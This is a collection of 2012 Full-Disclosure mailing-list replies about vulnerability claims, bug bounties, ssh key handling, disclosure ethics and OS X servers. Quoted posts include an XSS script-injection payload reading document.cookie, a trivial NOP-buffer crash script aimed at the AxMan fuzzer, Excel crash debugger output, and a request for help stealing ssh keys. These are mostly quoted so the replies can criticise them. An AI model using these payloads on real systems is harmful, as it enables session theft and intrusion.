Re: [Full-disclosure] Apple WGT Dictionnaire 1.3 - Script Code Inject Vulnerability
On Nov 27, 2012, at 5:52 PM, Vulnerability Lab resea...@vulnerability-lab.com wrote: Proof of Concept: = The software validation vulnerability can be exploited by local attackers with required user interaction and privileged local system account. For demonstration or reproduce ... PoC: Script Code Inject h1VL Tester/h1 “iframe src=http://vuln-lab.com iframe src=vuln-lab.com onload=alert(VLab) scriptalert(document.cookie)/scriptdiv style=1 Solution: = The vulnerability can be patched by parsing the search string input field and result output (listing) web context. Risk: = The security risk of the remote command execution vulnerability is estimated as high(+). Given the required user interaction and privileged local system account and other operational dependancies, by what means did you estimate a high risk? I guess the basic question would be how do you even classify this as a risk in the first place. Do you have some system of calculating risk or is it just a gut feeling type classification? t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Google raises sploit bounties
In fact, Yahoo!'s InfoSec team is called The Paranoids even outside Y! . t Sent from whatever device will keep us from debating which one is better. On Nov 26, 2012, at 2:37 PM, Nick Boyce nick.bo...@gmail.com wrote: On Sat, Nov 24, 2012 at 3:28 PM, Georgi Guninski gunin...@guninski.com wrote: http://www.theregister.co.uk/2012/11/23/mystery_chrome_0_day/ ... but that was before Google began offering up to $60,000 in bug bounties [...] Did I miss a major malware related to their warez? Or are they just paranoid? Of course they're paranoid - it's the only sensible policy. These days a paranoid may be defined as someone who has some idea of what's really going on ~ William Burroughs. MZ/RS: As far as I know, all reward increases for Google VRPs were driven by a combination of factors 1 through 3. Please stop ridiculing conspiracy theories with reasonable arguments :). No fun. +1 :) Nick -- When there's a shark in the water, you don't have to swim faster than the shark ... just faster than everybody else. ~~ alleged Australian business maxim. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security risks of doing business with China?
Really? I get nothing for that one??? That shit was FUNNY!!! :) On Nov 1, 2012, at 10:41 AM, bk cho...@gmail.com wrote: On Nov 1, 2012, at 1:43 AM, Dan Ballance wrote: Hi guys, I greatly respect the collective knowledge about security matters on this list. What do you make of this BBC report? Here in the UK we are seeming happy to do business with China, but other countries are blocking over alleged security concerns. Do you think these concerns are legitimate or is this purely political protectionism? http://www.bbc.co.uk/news/business-20163907 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ There are two main ways businesses are at risk when dealing with China: a) Trying to business _in_ China, the authorities won't let you setup shop directly, but instead force you into a joint venture with an established (and state-supported) Chinese company. In order to make and sell your products, you have to transfer a lot of intellectual property to the joint venture. Guess what happens to that intellectual property? Pretty soon there are multiple Chinese companies making exactly the same thing you make, but selling for a lot cheaper, and maybe not only in their domestic market. b) Deploying Chinese-built infrastructure components in critical areas of your country. There's a lot of hype about backdoors, but IMO the biggest practical risk is the technical experts they send to do the support. Do people do background checks on the support experts they send in who will have privileged access and debugging capabilities? I doubt it. Maybe they don't even steal any information directly, but simply file reports on how the infrastructure is designed and connected. That information alone has strategic value. Related to the original article, simply selling a stake as an investment doesn't appear to be all that risky. It's a question of what access is granted as a part of that investment. Do they get access to board members, to sensitive financial data? If there's no access to non-public data or trade secrets, then there wouldn't appear to be much risk. Are politicians exploiting China-bashing for votes? Absolutely. Just like any major issue, people are trying to hitch their wagon to it in improbable ways. That doesn't mean there isn't any truth to it. If you're a business going into China, know that their goal will be to replace you with domestic companies within several years. Don't get bullied into stretching past your risk tolerance. They're really good at making it seem like you have a huge opportunity, if only you give in just a little bit more... -- chort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
So, if you are a user on a system you're saying you can run code that attempts to run other code, and though that code doesn't end up running yet more code that's OK because you're already running code to begin with? Dude, you're going to, like, retire off those ZDI checks! t Sent from whatever device will keep us from debating which one is better. On Oct 29, 2012, at 11:12 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: thank you Jeff please tell me this is not exploitable http://www.exploit-db.com/exploits/22237/ -- all crashes which i gave i know is not that easy to exploit i just wanted to Proof how easy is to crash MS and i wanted to know MS opinion about any flaws so i am not going to give any crashes free as far as i can sell it to ZDI which i know is exploitable or i can exploit it for proof of concept And i will leave other crashes to exploit dev expert and crash analyzer to exploit it and enjoying flaws thank you every one for share Best Regards On Mon, Oct 29, 2012 at 5:47 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list Dear Peter and others please take a look @ it Best Regards Kaveh Ghaemmaghami Title : Microsoft Office Excel 2010 memory corruption Version : Microsoft Office professional Plus 2010 Date : 2012-10-27 Vendor: http://office.microsoft.com Impact: Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested: XP SP3 ENG ### Bug : memory corruption during the handling of the xls files a context-dependent attacker can execute arbitrary code (need investigate ) (b4c.1350): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0584 ebx=00135070 ecx=1000 edx=105f esi=06a80800 edi=0040 eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - Excel!Ordinal40+0x1ce0d0: 301ce0d0 668b5008mov dx,word ptr [eax+8] ds:0023:058c= Proof of concept included. http://www36.zippyshare.com/v/48422905/file.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] stealing ssh keys
Actually, the DSA key is used to sign the message in many applications, though I've often wondered exactly what reduction in security exists if the paired private key is used to sign material instead. Do you have any info on that? I've asked industry leaders in crypto, and while they report it should be avoided, I've never received any quantified answer. And just to make sure people understand (like the guy you replied to), the *message* is not encrypted with the pubic key - the *key the message is encrypted with* is encrypted with the public key. While you CAN asymmetrically encrypt some data (116 bytes with a 1024 RSA key), it is the symmetric key (e.g. AES) which gets encrypted/decrypted with PKI keys and th AES key used to encrypt and decrypt the message itself. I'm sure you knew ht, but others obviously don't. :). Sent from whatever device will keep us from debating which one is better. On Oct 24, 2012, at 11:51 PM, Ivaylo Hubanov sniff...@gmail.com wrote: Yes Raj, You almost got the RSA encryption/decryption flow. :) Just the private key is used to sign the data and not to encrypt it. Check this http://en.wikipedia.org/wiki/Public-key_cryptography; Each user has a pair of cryptographic keys - a public encryption key and a private decryption key. ... The two main uses for public-key cryptography are: - Public-key encryption: a message encrypted with a recipient's public key cannot be decrypted by anyone except a possessor of the matching private key - it is presumed that this will be the owner of that key and the person associated with the public key used. This is used to attempt to ensure confidentiality. - Digital signatures: a message signed with a sender's private key can be verified by anyone who has access to the sender's public key, thereby proving that the sender had access to the private key and, therefore, is likely to be the person associated with the public key used. This also ensures that the message has not been tampered with (on the question of authenticity, see also message digest). regards, sniffski ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] stealing ssh keys
I think you're over reacting just a bit. You can give out your private key to whomever/whatever you want to be able to decrypt data encrypted with the public key. It all depends on the use-case, and what you want done. Just because its a private key doesn't mean it's automatically some critical security component. Many times it is, but it doesn't have to be. t Sent from whatever device will keep us from debating which one is better. On Oct 24, 2012, at 10:59 AM, Jacqui Caren jacqui.ca...@ntlworld.com wrote: On 23/10/2012 16:07, Daniel Sichel wrote: Hello everybody: environment is A is hacker client? B is target and C is Manager center and C have all A and B private key. WTF! Why would anyone C or B or even A give out a PRIVATE key. Does no one RTFM - you never ever give out your private key and you protect it to heck and back. C are open 80,22. And this is http's 403 state on the C. I have A's root,how to steal private key On the C. Are there have some vuln with openssh. Is there some impossible which C login in to the A and B when A and B let C run some bash. OK, I am a total n00b here but I do not see how having an ssl connection would help reveal an SSH key. Our organization generates our root certs separate from, and unrelated to SSH keys.. I do not see how SSL access in and of itself, helps get at SSH keys, If it does, let me know, I bank at Chase and that would be darn handy to know (believe me, they have it coming)! This is full disclosure not help a student do his homework. My advice: give him a very blatantly stupid answer - let him get null points from teacher :-) Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple 0-days in Dark Comet RAT
It's InfoSec. Nothing has any meaning anymore. Or, better stated, things means whatever people want them to mean in order to forward their agenda. When we talked about full disclosure a while back, somebody said I was jaded as if it meant I had clouded judgement. They were actually right though, as jaded means negative by way of experience. I remember when people started using metrics like moderately critical to describe their [what they called] 0-day XSS vulnerability for some ancient CRM package. That way they get to say they published 14,000 0-days on their marketing material. Some dude recently posted on a professional list how he routinely cracks the NTLMv2 hashes for 10,000 users in 36 hours with rainbow tables. Of course every single part of the statement is complete BS but no one (except me) even blinked. People talk about how stupid users are, but I think the people in the industry are far worse. Sent from whatever device will keep us from debating which one is better. On Oct 9, 2012, at 9:59 AM, Philip Whitehouse phi...@whiuk.com wrote: Does 0-day have any meaning any more? It used to mean there were exploits in the wild used to cause damage before the vendor patched it not merely that a security researcher found it and disclosed it to the public before the vendor did. If a 0 day is everything found by a security team before a vendor then the term will loose all purpose and meaning because almost all work done by such researchers is finding vulns. before the vendor. End rant. Philip Whitehouse On 8 Oct 2012, at 21:33, Hertz, Jesse jesse_he...@brown.edu wrote: SQL Injection and Arbitrary File Access present in Command and Control server of DarkComet RAT for more info see: http://matasano.com/research/PEST-CONTROL.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86? T Sent from whatever device will keep us from debating which one is better. On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ adobe-flash-install-shit.png ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Dangerous of Fakeroot
Yep, actually had a reply in my drafts. I think he's serious. We've been getting those lately. t On Aug 27, 2012, at 2:37 PM, Wiliam Steck codeinject...@gmail.com wrote: this will only work if the desired user is in sudo and has permissions to execute as root. Otherwise, this post was a huge troll to get traffic to the website this article is hosted on. [20101:20100 - 0:501] 02:31:36 [nethic@nekobus:/dev/pts/9 +1] ~ $ fakeroot [20209:20194 - 0:501] 02:31:39 [root@nekobus:/dev/pts/9 +3] ~ $ ls /root ls: cannot open directory /root: Permission denied [20209:20194 - 0:502] 02:31:47 [root@nekobus:/dev/pts/9 +3] ~ $ python Python 2.7.3 (default, Apr 20 2012, 22:39:59) [GCC 4.6.3] on linux2 Type help, copyright, credits or license for more information. import os os.system(sudo su) ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. [sudo] password for nethic: Sorry, try again. [sudo] password for nethic: Sorry, try again. [sudo] password for nethic: Sorry, try again. sudo: 3 incorrect password attempts 256 os.system(touch /root/test) touch: cannot touch `/root/test': Permission denied 256 Better luck next time 3 3 3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how i stopped worrying and loved the backdoor
Indeed. When I first saw it, I thought someone was coming out of the closet! t On Aug 19, 2012, at 4:40 AM, Robert Kim App and Facebook Marketing evdo.hs...@gmail.com wrote: DakaRand seems to work inside of VM's too Dan, if you get any new revelations on it, please do make sure you post using a different subject line. This one's getting really congested. Thanks! -- Robert Q Kim, Trade Show Marketing Strategies VP Sparkah Destination Event Management http://www.youtube.com/watch?v=RrXcLCVkFds 2611 S Coast Highway San Diego, CA 92007 310 598 1606 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tech journalists: Stop hyping unproven security tools
Ah, well that's the problem then. At lion they dropped all support for Rosetta. But there you have it! Mine is *better*. Now we don't have to debate... Wait. Crap! Sent from whatever device will keep us from debating which one is better. On Aug 13, 2012, at 9:55 AM, Stefan Edwards saedwards@gmail.com wrote: No way did I just google for that; I'm actually working on a rewrite in ObscureLNG/S, and I've been following the progress of the original project closely. Besides, it's not as if that plug is supported anyway; it was written with OS X 10.1 support, and is broken on later versions. The windows version is terrible (really, Win32 in today's world?) and the Linux version is downloadable only from the vendor's .vn subsidiary. On Mon, Aug 13, 2012 at 12:49 PM, Thor t...@hammerofgod.com wrote: What, you just Google for that?? You've clearly not tried that fix or you'd know how hard it is to solder that thing. Well, unless you've got really expensive equipment. And what do you do if you are out and it breaks? I'll stick with mine, thank you!! t On Aug 13, 2012, at 9:39 AM, Stefan Edwards wrote: That is totally untrue. There is a partially-working and unmaintained project on github that totally allows you to skip the plug, if you're willing to just put in a bit of time to setup the entire suite of tools necessary to run this one project. On Mon, Aug 13, 2012 at 12:35 PM, Thor t...@hammerofgod.com wrote: Hell yeah I am. It's the only thing I could find that would sync up to that other thing, unless you buy the thing that plugs into the other thing! On Aug 13, 2012, at 9:00 AM, Lincoln Anderson wrote: Sent from whatever device will keep us from debating which one is better. You're seriously using that thing? I've found it's restricted [vendor term for application library] is a huge detriment to an already ailing product. You should probably just switch to the more popular Whichever Platform Prevents Argumentation Over Superiority (admittedly less popular, but gaining ground and a true forum fanboi's dream!). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Q. How many Prolog programmers does it take to change a lightbulb? A. No. -- Q. How many Prolog programmers does it take to change a lightbulb? A. No. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tech journalists: Stop hyping unproven security tools
The first and most obvious point is that they are NOT journalists. They are monkey read, monkey write content pushers with no regard for truth, accuracy, or fairness. Look at what's happened with the Apple thing. One monkey reads what another monkey wrote, figures it's true, and writes his own version, mixing things 'round a bit. Now when you read something it sounds like the whole of cloud computing is at risk. It's all crap.They do whatever they can to get you to their site so you are forced to watch a 30 second commercial ( which is moronic, btw). T Sent from whatever device will keep us from debating which one is better. On Aug 12, 2012, at 7:57 PM, Ivan .Heca ivan...@gmail.com wrote: Cui bono http://paranoia.dubfire.net/2012/07/tech-journalists-stop-hyping-unproven.html?utm_source=Contextlyutm_medium=RelatedLinksutm_campaign=AroundWeb ouch http://blog.alexanderhiggins.com/2012/08/10/experts-idiots-war-security-165251/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AxMan ActiveX fuzzing == Memory Corruption PoC
Actually, you did ask him to read it. You asked everyone to read it by posting it. That's the way this works. If you can't handle criticism for moronic advisories, then *you* are the one who needs to keep it to yourself. T Sent from whatever device will keep us from debating which one is better. On Jul 29, 2012, at 3:08 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: I think ur on vacation now aren't u Plus nobody ask u to read my post and i am not interested about ur opinion keep it for yourself On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Exploit Title: AxMan ActiveX fuzzing == Memory Corruption PoC Crash : http://imageshack.us/f/217/axman.jpg/ Date: July 28, 2012 Author: coolkaveh coolka...@rocketmail.com Https://twitter.com/coolkaveh Vendor Homepage: http://digitaloffense.net/tools/axman/ version : 1.0.0 Tested on: windows 7 SP1 Crash The Exploiter Lame HD Moore fuzzer Memory Corruption By Awsome coolkaveh --- import os import win32api crash = Crash The Exploiter lame=Lame HD Moore fuzzer Memory corruption awsome= By Awsome coolkaveh print print print print crash print print lame print print awsome print print print print exploit = (\x90 *800) win32api.WinExec((r'D:\axman-1.0.0\bin\axman.exe %s') % exploit, 1) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Right - if you've compromised the server to the point you can alter directory structures/names, the you've already bypassed the ACLs required in order to exploit the vulnerability that allows you to bypass the ACLs. I don't get it. t On 7/16/12 10:47 AM, Григорий Братислава musntl...@gmail.com wrote: On Mon, Jul 16, 2012 at 1:24 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Hi Lists, it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update. Hello Full Disclosure!! !! !! Is like to introduce you to Schrödinger's Cat and Wigner's Friend in is Computer Security. 'The Wigner's Friend thought experiment posits a friend of Wigner who performs the Schrödinger's cat experiment after Wigner leaves the laboratory. Only when he returns does Wigner learn the result of the experiment from his friend, that is, whether the cat is alive or dead. The question is raised: was the state of the system a superposition of dead cat/sad friend and live cat/happy friend, only determined when Wigner learned the result of the experiment, or was it determined at some previous point?' http://en.wikipedia.org/wiki/Wigner's_friend http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat IIS is neither vulnerable or not vulnerable. Is until you is exploit it and verify! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] has Thor big ego, has Thor long boring messages
Sure, no problem. Heaven forbid we talk about something like full disclosure on the, um, Full Disclosure list. What was I thinking? Thanks for coming out hiding as per your official letter to FD telling us you were leaving just to set me straight. T From: NETT Dave nett.d...@yahoo.commailto:nett.d...@yahoo.com Reply-To: NETT Dave nett.d...@yahoo.commailto:nett.d...@yahoo.com Date: Tuesday, July 10, 2012 11:38 PM To: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Cc: Timothy Mullen t...@hammerofgod.commailto:t...@hammerofgod.com Subject: has Thor big ego, has Thor long boring messages Thor, u're has always has given lessons too others in long so boring messages. Big ego, has not that smart after all. Please has us let peace: has you shut up. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Preferred OSX Security/Server Lists
Same here… I couldn't find anything that really served my needs. It was hard enough to find the right resource to enable a single user to have multiple email addresses for OSX Lion Server Mail – but I figured that out. Maybe we should start one then? I'm moving the HoG website over as well and I'll be including the Wiki stuff, so I'll have the resources to host something like that. Regarding the actual reason for moving, there are several, but I'll focus on the most important. I'm a big music and media person, and I like to be able to have my music accessible when and where I want it and have options for redirection of equipment. Setting up Windows Media Center was a pain, and it was slow and very limited in features. And there were issues with Zune files working or not working, the general requirement for network configuration, and just a lot of complexity. With OSX I just run it, tell iTunes to share my library, and then I can play whatever I want on my iPad or iPhone. Then I just plugged in the AppleTV to my main entertainment system, and then I could remotely play stuff on my iPhone directly to that stereo. I have speakers run outside, so I can literally be in the backyard and tell my iPhone Play Robert Plant and it plays from my phone to the Apple TV and out the speakers. SUPER smooth. So after that I starting digging in to OSX more and have liked it more and more as I go. Having the same features with such a dramatically less complex installation is really a huge benefit to me. iCal, iChat, Mail, and iContact servers and amazingly simple and do exactly what I need – compared to Exchange and PS, and all that stuff, well… :) Of course my main concern (and reason for posting) is that I want to make sure I do my due diligence and learn what I need to learn in order to properly secure the services I put out on the Internet. For instance, I can set up IIS to be tremendously secure in my sleep as I've done it for years. However, I don't know what to do with Apache. I just don't know it. So I want to find out about principal accounts, service contexts, virtual directories, server-side applications, etc etc. HoG has never been hacked (to my knowledge) but I'm totally expecting to be pwned now that I'm basically doing a 180 in my production environment. I think starting an actual Mac security list would be a good idea. Hell, maybe I can sell enough Thor's Microsoft Security Bible copies to help buy more Mac equipment :) LOL. t From: phocean 0...@phocean.netmailto:0...@phocean.net Date: Wednesday, July 11, 2012 12:32 PM To: Timothy Mullen t...@hammerofgod.commailto:t...@hammerofgod.com Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Preferred OSX Security/Server Lists Hi, I do not know any specific stuff yet, though I have been a recent switcher myself. I had a quick look but it seems that there are not many resources. So this is going to be an interesting topic. Just curious: what are the motives for your switch? Regards, --- phocean Le 9 juil. 2012 à 19:45, Thor (Hammer of God) a écrit : Greets all. I was hoping to get some opinions on your favorite OSX security/server admin sites/lists. I'm converting the HoG internal and production networks over to OSX and OSX Server and would like some pre-vetting suggestions for a decent source of information. Thanks much. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Preferred OSX Security/Server Lists
Yep, saw those. There's some good material there, but it is dated and I was hoping for more of a discussion environment like we have on the list (when we actually discuss security here). I'm just a bit surprised as most of the hacks all run Mac. But I guess they don't run it in a production environment and serve up public services. That said, look at the Focus-MS listŠ With constant barrage of MSFT configuration questions and security requirements, there's not been a single post there in years it seemsŠ t On 7/11/12 3:38 PM, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Jul 11, 2012 at 6:00 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Same hereŠ I couldn't find anything that really served my needs. It was hard enough to find the right resource to enable a single user to have multiple email addresses for OSX Lion Server Mail but I figured that out. Maybe we should start one then? I'm moving the HoG website over as well and I'll be including the Wiki stuff, so I'll have the resources to host something like that. [SNIP] https://www.google.com/#hl=ensclient=psy-abq=osx+server+security+configu ration+guide The first two hits are the NSA and Apple. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Preferred OSX Security/Server Lists
Hey, no worries at all… I appreciate the response! The more infoz the better! I'll check these out too… On 7/11/12 5:53 PM, Jeffrey Walton noloa...@gmail.com wrote: Hi Thor, My bad. I was not sure if you wanted a check list or mailing list. https://lists.apple.com/mailman/listinfo. The server stuff looks like its covered under https://lists.apple.com/mailman/listinfo/macos-x-server. There's a low volume security list at https://lists.apple.com/mailman/listinfo/apple-cdsa. Jeff On Wed, Jul 11, 2012 at 8:44 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Yep, saw those. There's some good material there, but it is dated and I was hoping for more of a discussion environment like we have on the list (when we actually discuss security here). I'm just a bit surprised as most of the hacks all run Mac. But I guess they don't run it in a production environment and serve up public services. That said, look at the Focus-MS listŠ With constant barrage of MSFT configuration questions and security requirements, there's not been a single post there in years it seemsŠ On 7/11/12 3:38 PM, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Jul 11, 2012 at 6:00 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Same hereŠ I couldn't find anything that really served my needs. It was hard enough to find the right resource to enable a single user to have multiple email addresses for OSX Lion Server Mail but I figured that out. Maybe we should start one then? I'm moving the HoG website over as well and I'll be including the Wiki stuff, so I'll have the resources to host something like that. [SNIP] https://www.google.com/#hl=ensclient=psy-abq=osx+server+security+confi gu ration+guide The first two hits are the NSA and Apple. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing
Moral obligation to disclosing bugs? Really? The statement wasn't about what happens when there is disclosure or the effect it has - the statement was in regard to the purpose one does the research and subsequent disclosure in the first place. It is, quite simply, to be recognized. I didn't say anything was wrong with that, I was just stating that it is. People do not disclose their research to make the world a better place. They do it for recognition or for money. One may argue they are related. Are you telling me that these people intentionally begin researching some random product because they have some duty to ensure a fix is produced? If you think that, you are quite naïve. People certainly report bugs anonymously, but those are bugs they happen upon, not those they set out to find. Just look at how many bugs are released anonymously. Statistically none. You paint the picture as if people volunteer hours upon hours of research into any random product to find a bug so that they can insure a fix is produced as it they have some duty to do so. Nuts, man. Oh, and your reference to Maslow actually makes my point. The most basic need is sex (getting laid). The next most basic need is employment (getting paid). The next tier is sexual intimacy (getting laid), the neigh is achievement (getting paid) and finally the acceptance of facts that everything you do is to get paid or get laid. But as Val said, this thread has about run its course, and there's not been much new material on the subject (even though Григорий Братислава has provided needed entertainment). On 7/10/12 9:15 AM, Justin Klein Keane jus...@madirish.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello, I feel compelled to point out that disclosing a bug *is* contributing. It requires a lot of time and effort to find a bug, which is a contribution to the target software, even if only seen as free quality assurance work. Disclosure is undeniably inconvenient for vendors, but it is demonstrably one of the surest ways to ensure a fix is developed. Security researchers arguably have as much responsibility to end users as to vendors. If a researcher finds a bug, unless they believe they are the best person in the world at what they do, they must conclude black hats have access to the bug. Disclosing the bug is the lowest resistance way for a researcher to concurrently inform the user base and provide impetus for the vendor to fix the issue. The proposition that disclosure is purely selfish ego stroking ignores the viewpoint that disclosure is a moral obligation, which is just as valid. Maslow's hierarchy of needs clearly illustrates that not everyone is motivated by getting paid or getting laid. Justin C. Klein Keane http://www.MadIrish.net On 7/10/12 11:42 AM, Mikhail A. Utin wrote: Hello, I completely agree with Thor. We have to do something for free. We have to contribute, not just use. Whoever and whatever. Examples: - This list is ran for free (hardware, software, time, energy are used for) and giving us a chance to communicate - The most of us use Linux, whichever flavor you prefer. The most of it is free time contribution. Somebody pays for that, but we use. It is nice to be paid for something, but consider the alternative. Otherwise our communications will die and we do not have an OS for a fun or profit. Mikhail Utin -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of full-disclosure-requ...@lists.grok.org.uk Sent: Tuesday, July 10, 2012 7:00 AM To: full-disclosure@lists.grok.org.uk Subject: Full-Disclosure Digest, Vol 89, Issue 11 -- Message: 7 Date: Mon, 9 Jul 2012 17:24:51 + From: Thor (Hammer of God) t...@hammerofgod.com Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug? To: Georgi Guninski gunin...@guninski.com, Stefan Kanthak stefan.kant...@nexgo.de Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Message-ID: cc205e3d.3561%t...@hammerofgod.com Content-Type: text/plain; charset=Windows-1252 I'm not contradicting myself at all - in fact, *you* are the exact type of person I'm talking about. You couldn't give a rat's ass about the industry or anyone but yourself. Nothing you have ever done has been valuable to anyone other than you; it has been completely self-serving egotistical bullshit. CONFIDENTIALITY NOTICE: This email communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please reply to the sender immediately
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing
